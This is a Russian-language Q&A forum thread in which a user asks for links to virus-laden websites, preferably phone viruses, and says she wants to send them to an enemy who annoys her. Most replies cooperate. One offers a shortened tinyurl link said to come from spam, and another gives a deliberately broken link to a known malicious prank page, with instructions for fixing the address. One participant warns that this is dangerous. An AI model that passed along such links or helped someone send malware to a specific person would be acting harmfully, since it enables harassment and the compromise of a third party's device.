По поводу вирусных сайтов

Крутая Девка Профи (566), открыт 1 неделю назад
Здравствуйте, вы можете прислать пж вирусные сайты и ссылки, содержащие вирусы? Желательно телефонные вирусы.
4 ответа
Серый Сталкер Мастер (2001) 1 неделю назад
зачем тибе ?
Крутая ДевкаПрофи (566) 1 неделю назад
Хочу отправить своему врагу, он меня уже задолбал.
Крутая Девка, http://www.tinyurl.com/2cjccf3v#BS0EOR сам не знаю что (спам с моей почты)
Серый СталкерМастер (2001) 1 неделю назад
хпхаха
Серый СталкерМастер (2001) 1 неделю назад
он разве откроет сайт этоот
. Профи (640) 1 неделю назад
нет, это опасно
Крутая ДевкаПрофи (566) 1 неделю назад
Я принимаю риск и хочу продолжить
ITZ_darkkingRoblox Ученик (164) 1 неделю назад
ну хз, будет ли работать на телефоне, но работает хорошо на компе. https://youareanidiot.orgl (уберите л в конце, не пропускает просто)
Крутая ДевкаПрофи (566) 1 неделю назад
Спасибо
Крутая ДевкаПрофи (566) 1 неделю назад
Скажите, а я заражусь вирусом сразу же, как только перейду по этой ссылке или там надо будет что то скачать?
ITZ_darkkingRoblox Ученик (164) Крутая Девка, а ты на чëм проверять будешь? на компе или на телефоне в итоге?